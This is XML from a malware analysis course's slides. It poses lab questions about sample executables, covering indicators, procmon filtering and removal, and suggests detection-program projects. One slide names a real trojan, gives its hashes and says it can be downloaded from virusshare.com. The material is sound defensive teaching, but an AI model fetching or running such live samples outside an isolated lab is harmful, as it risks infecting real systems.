      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="625" name="Google Shape;625;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="1772815"/>
            <a:ext cx="7173576" cy="508518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63"/>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Practice 3 [Surface &amp; Dynamic Analysis]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p63"/>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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>PE File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lab03-01.exe, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>What are the malware’s imports and strings? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>What are the malware’s host-based indicators</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Are there any useful network-based signatures for this malware? If so, what are they?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>How to detect and remove the malware?</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Project idea</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Write a simple program to </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Detect the malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Remove the malware off the infected PC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>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4"/>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Practice 4 [Surface &amp; Dynamic Analysis]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="639" name="Google Shape;639;p64"/>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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>PE file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Lab03-02.dll</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Import &amp; Export?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How can you get this malware to install itself?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How would you get this malware to run after installation?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How can you find the process under which this malware is running?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Which filters could you set in order to use procmon to glean information?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What are the malware’s host-based indicators?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Are there any useful network-based signatures for this malware?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65"/>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Practice 4 [Surface &amp; Dynamic Analysis]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Google Shape;645;p65"/>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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>PE file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Lab03-03.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What happening when this malware executes (monitoring by Process Explorer)?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Identify any live memory modification?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What are the malware’s host-based indicators?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is the goal of this malware?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Project idea</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Write a simple program to </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Detect the malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Remove the malware off the infected PC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>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66"/>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Practice 4 [Surface &amp; Dynamic Analysis]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Google Shape;651;p66"/>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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>PE file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Lab03-04.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What happens when you run this file?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is causing the roadblock in dynamic analysis?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Are there other ways to run this program?</a:t>
            </a:r>
            <a:endParaRPr b="1"/>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7"/>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Practice [A real virus]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="Google Shape;658;p67"/>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A real virus: Trojan.Win32.Mooze</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Download from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>virusshare.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SHA256</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>855e3aa2a4b8432f5a2b77a6aa2635ae8382ca6df76b4c0d7405856faa7b5b5b</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>MD5</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>efc05e673dc516a6a96bc346dc7c93a6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8"/>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Project idea</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Google Shape;664;p68"/>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Write a simple program for monitoring processes running in Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Write a simple signature and/or behaviour-based malware detection and removal program</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Collect &amp; store the malware signatures &amp; behaviours</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Options: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Quick scan: signature-based scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Full scan: behaviour-based scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>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9"/>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Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Google Shape;671;p69"/>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Level of Abstraction</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Google Shape;672;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724128" y="2420888"/>
            <a:ext cx="2425992" cy="1296144"/>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3" name="Google Shape;673;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5723430" y="2679303"/>
            <a:ext cx="15905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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>push ebp</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GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>move ebp, esp</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GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>sub esp, 0x40</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="Google Shape;674;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
